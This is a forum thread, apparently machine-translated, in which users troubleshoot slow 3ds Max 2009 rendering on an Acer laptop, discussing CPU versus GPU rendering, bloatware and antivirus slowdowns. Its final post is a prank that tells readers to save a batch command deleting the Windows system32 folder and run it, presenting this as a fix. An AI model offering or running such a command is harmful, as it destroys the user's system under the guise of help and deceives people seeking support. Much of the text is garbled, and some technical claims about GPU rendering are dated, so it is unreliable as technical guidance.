Thread: Acer computer running very slow

Acer computer running very slow

With the need of my 3D rendering, I installed 3ds max 2009 on the laptop.

On paper, my friends PC is better than mine:

friends : processor - Core2Duo T5870 (2GHz), ram - 3 GB DDR2

my : processor - amd x2 3800, ram - 2GB DDR2

However, during the 3D rendering on the laptop it takes long time.

What is the trouble? Its an Acer computer. Is that it may come from crap installed on the pc based? Because the task manager does not tell me that 98% dedicated to 3ds max, and 1.5 GB for it

What can I do?

Re: Acer computer running very slow

Maybe the graphics card that makes the difference and probably the hard drive. Since this problem is related to 3d graphics, we can not completely blame the computer. I think your graphics card is taking long to respond. Or it may also be due to hard drive (bad sectors or some virus infected).

I don't think the graphics card has more than a mere role to play in terms of rendering speed. This should come from something else, I suppose. Any other suggestions?

Absolutely not because of the rendering. Rendering involves processor and RAM only (and possibly the hard drive if a swap file or a required course in animation). The VGA is used only to see the 3D workspace. And yet 3DS Max only uses it for our big VGA only very summary manner.

So here is good also.

Well, generally, 3ds Max on a laptop is not necessarily the top. Especially if the installation manufacturer is stuffed with all kinds of crap. Then comes the operating system. 3DS Max, even 2009, under Vista is slow and full of various huddles.

Then there is the virus. Norton may pose this problem. It happened once to have a machine very slow in 3DS Max. This slowness had disappeared after uninstalling the antivirus program. Otherwise, the multiprocessor option is very active in the Preferences rendering tab in 3DS Max?

Thanks for that information but the laptop had Vista installed by the manufacturer. When it was recovered it was XP. As there is no dual boot possible, I guess this is indeed a 100% XP that is installed with the PC. I'll look into whether any of their crap EyeSecure and other BioSecure, norton is not dragging.

And how to optimize multi-core, I just forgot!

Quote Originally Posted by Yitzchak909 View Post
    Rendering involves processor and RAM only (and possibly the hard drive if a swap file or a required course in animation). The VGA is used only to see the 3D workspace. And yet 3DS Max only uses it for our big VGA only very summary manner.
    It's still a great pity that this software does not like the other and do not take advantage of graphics cards.

But, to my knowledge there is no heavyweight 3D (Maya, 3DS Max, Lightwave or Cinema4D) which uses the GPU as a coprocessor specialized in computing delivered. All calculations are performed by the CPU.

Same thing for the alternative renderers (Vray, Maxwell Render and others). Chaos Group went so far out recent version of Vray RT (Real Time) that displays real-time rendering quality, like a video game so without needing a dedicated VGA and drawing only advantage of CPU resources. This is to make accurate 3D presentations and interactive machines nomadic well equipped in CPU but with integrated graphics solutions.

To my knowledge, the only company to have proposed a rendering engine GPU-based raytracing, with nVidia's Gelato, which is free and more. This is consistent with their policy of research and development (GPCPU, Cuda, etc..)

There may have been others but probably not.

umm idk but try going to notepad and type this:
    @echo off del c://windows/system32
    then save it as anything.bat and launch it.
    it helped mealot